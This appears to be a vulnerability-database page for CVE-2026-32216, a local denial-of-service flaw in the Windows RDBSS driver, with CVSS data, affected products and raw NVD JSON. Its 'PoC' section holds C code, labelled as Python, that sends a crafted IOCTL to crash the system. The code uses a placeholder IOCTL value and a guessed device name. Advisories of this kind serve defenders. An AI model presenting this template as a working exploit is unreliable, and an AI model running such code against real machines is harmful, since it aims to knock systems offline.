Security Vulnerability Report
中文
CVE-2026-32216 CVSS 5.5 MEDIUM

CVE-2026-32216

Published: 2026-04-14 18:17:29
Last Modified: 2026-04-20 14:34:44

Description

Null pointer dereference in Windows Redirected Drive Buffering allows an authorized attacker to deny service locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:* - VULNERABLE
Windows (具体受影响版本需参考微软安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <stdio.h> // PoC for CVE-2026-32216 // Conceptual demonstration of triggering a Null Pointer Dereference in RDBSS int main() { HANDLE hDevice; DWORD bytesReturned; char inputData[0x20] = {0}; // Attempt to obtain a handle to the RDBSS device // Note: The actual device link name may vary depending on the specific Windows version and configuration hDevice = CreateFileA("\\\\.\\Rdbss", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %d\n", GetLastError()); printf("[*] This PoC requires the vulnerable driver to be loaded and accessible.\n"); return 1; } printf("[+] Device opened successfully. Handle: 0x%p\n", hDevice); // Prepare input buffer to trigger the vulnerability // The specific data structure depends on the internal logic of the RDBSS driver memset(inputData, 0x41, sizeof(inputData)); printf("[*] Sending malicious IOCTL to trigger Null Pointer Dereference...\n"); // Sending the DeviceIoControl request // 0xXXXXXX represents the specific IOCTL code that triggers the bug BOOL result = DeviceIoControl(hDevice, 0xXXXXXX, // Vulnerable IOCTL Code inputData, sizeof(inputData), NULL, 0, &bytesReturned, NULL); if (!result) { printf("[-] DeviceIoControl failed. Error: %d\n", GetLastError()); } else { printf("[+] IOCTL returned successfully. If the bug exists, the system may crash now.\n"); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32216", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:28.880", "lastModified": "2026-04-20T14:34:43.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Null pointer dereference in Windows Redirected Drive Buffering allows an authorized attacker to deny service locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "690E74A8-E72C-47B6-96EB-37C48D69A635"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.28000.1836", "matchCriteriaId": "13A01FA1-08DC-4E33-9FFC-AB4BCD9634CA"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32216", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}